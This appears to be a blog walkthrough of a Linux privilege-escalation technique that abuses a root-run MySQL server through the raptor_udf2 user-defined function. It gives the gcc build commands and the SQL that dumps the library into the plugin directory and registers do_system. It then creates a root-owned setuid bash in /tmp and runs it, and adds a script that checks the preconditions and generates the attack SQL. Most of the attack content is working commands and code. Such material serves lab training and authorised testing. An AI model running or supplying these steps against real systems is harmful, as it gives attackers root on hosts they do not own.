Linux Privilege Escalation — MySQL Service UDF Exploit

Sekkio
3 min read, Sep 19, 2023


MySQL offers several routes to executing shell commands on the underlying host. This post uses a user-defined function (UDF): a shared library that the server loads and calls, so whatever the library does runs with the privileges of the mysqld process.

Once you have a foothold on the machine, check two things before going further: the MySQL server process (mysqld) is running as root, and you can log in to it as the MySQL root account, either without a password or with a password you have already recovered. The technique also relies on the FILE privilege (which the MySQL root account has) and on a secure_file_priv setting that does not block the server from writing into its plugin directory.

ps aux | grep mysql
mysql -u root
[Screenshot: mysqld running as the root user]
[Screenshot: logging in to MySQL as root without a password]

We use raptor_udf2, the widely shared UDF exploit by raptor (Exploit-DB 1518). It defines a do_system function that calls system() from inside the server, so the command runs as the user mysqld runs as, root in this case. It first has to be compiled into a shared object (.so), the Linux counterpart of a Windows DLL, because that is what CREATE FUNCTION ... SONAME loads. Build it on the target if gcc is available, otherwise on a machine with the same architecture and a compatible glibc.

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
[Screenshot: the exploit C file compiled into a shared object]

As an ordinary user we usually cannot write to the server's plugin directory (here '/usr/lib/mysql/plugin/'; the server reports its own value in the plugin_dir variable). The trick is to have mysqld write the file for us: LOAD_FILE() and INTO DUMPFILE are executed by the server process, which runs as root, and the MySQL root account holds the FILE privilege they require. Inside the 'mysql' database we create a table 'foo' with a single BLOB column, load the compiled shared object into it, dump that row byte for byte into the plugin directory, and finally register a function named 'do_system' backed by the new library. Note that INTO DUMPFILE only succeeds while secure_file_priv is empty or names a tree that contains the plugin directory; if it is NULL the server refuses the write.

use mysql;
select * from mysql.func; # list the user-defined functions already registered
[Screenshot: listing the databases and user-defined functions]
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
[Screenshot: creating the new user-defined function in MySQL]

Using the new 'do_system' function, we copy '/bin/bash' to '/tmp/rootbash' and run chmod +xs on the copy: +x makes it executable and +s sets both the setuid and setgid bits. Because mysqld performed the copy, the file is owned by root, so the setuid bit makes it run with root's identity.

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
[Screenshot: copying /bin/bash to /tmp as a root-owned setuid binary]

Afterward, run '/tmp/rootbash' with the '-p' option. Bash drops an elevated effective uid at startup when it differs from the real uid, unless started with -p, so this gives a shell whose effective uid is root.

/tmp/rootbash -p
[Screenshot: shell running with root privileges]
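Before typing the statements above, a practitioner would verify the preconditions the post relies on: mysqld really owned by root, a working root login, and a secure_file_priv that lets INTO DUMPFILE land a file in plugin_dir. The script below is an added example, not part of the original post and not raptor's code; the function names and the --run flag are my own, and the process listing fed to its checks in testing is constructed rather than captured from a target. Live use is `./udf_preflight.sh --run [path/to/raptor_udf2.so]`, which needs a passwordless `mysql -u root` (or MYSQL_PWD exported) and prints the SQL only when every check passes.

```shell
#!/bin/bash
# Pre-flight checks and statement generation for the MySQL UDF privilege-escalation path.
# Added example; function names are mine. Sample inputs used for testing are constructed.

# Read a `ps -eo user,comm` listing on stdin and succeed only if a mysqld
# (or MariaDB's mariadbd) process is owned by root. If the server runs as the
# unprivileged "mysql" user, do_system would give you that user, not root.
mysqld_runs_as_root() {
    awk '$1 == "root" && $2 ~ /^(mysqld|mariadbd)$/ { found = 1 }
         END { exit (found ? 0 : 1) }'
}

# $1 = plugin_dir, $2 = secure_file_priv as printed by `mysql -N -B`:
#   ""      -> unrestricted: INTO DUMPFILE may write anywhere mysqld can
#   "NULL"  -> file import/export disabled; this technique is closed
#   "/dir"  -> LOAD_FILE and INTO DUMPFILE are confined to that tree
# Succeeds when INTO DUMPFILE is allowed to write into plugin_dir.
dumpfile_can_reach_plugin_dir() {
    local plugin_dir="${1%/}/" priv
    case "$2" in
        "")   return 0 ;;
        NULL) return 1 ;;
    esac
    priv="${2%/}/"
    case "$plugin_dir" in
        "$priv"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Emit the statements from the post with the paths filled in.
# $1 = path of the compiled raptor_udf2.so (read by mysqld via LOAD_FILE, so it
#      must be readable by the server and, when secure_file_priv is set, inside it)
# $2 = plugin_dir reported by the server
# $3 = command for do_system (must not contain single quotes)
build_udf_sql() {
    cat <<EOF
use mysql;
create table foo(line blob);
insert into foo values(load_file('$1'));
select * from foo into dumpfile '${2%/}/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('$3');
EOF
}

# Run the checks against the local server and print the SQL if they all pass.
preflight() {
    local plugin_dir priv
    if ! ps -eo user,comm | mysqld_runs_as_root; then
        echo "mysqld is not running as root; do_system would not give root" >&2; return 1
    fi
    plugin_dir=$(mysql -u root -N -B -e 'select @@plugin_dir' 2>/dev/null) || {
        echo "cannot log in to MySQL as root" >&2; return 1; }
    priv=$(mysql -u root -N -B -e 'select @@secure_file_priv')
    if ! dumpfile_can_reach_plugin_dir "$plugin_dir" "$priv"; then
        echo "secure_file_priv='$priv' blocks writes to $plugin_dir" >&2; return 1
    fi
    build_udf_sql "$1" "$plugin_dir" 'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash'
}

if [ "${1:-}" = "--run" ]; then
    preflight "${2:-/home/user/tools/mysql-udf/raptor_udf2.so}"
fi
```

The generated SQL is printed rather than piped straight into the client so that you can read the exact paths the server reported before anything is written to disk; paste it into `mysql -u root` once it looks right.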
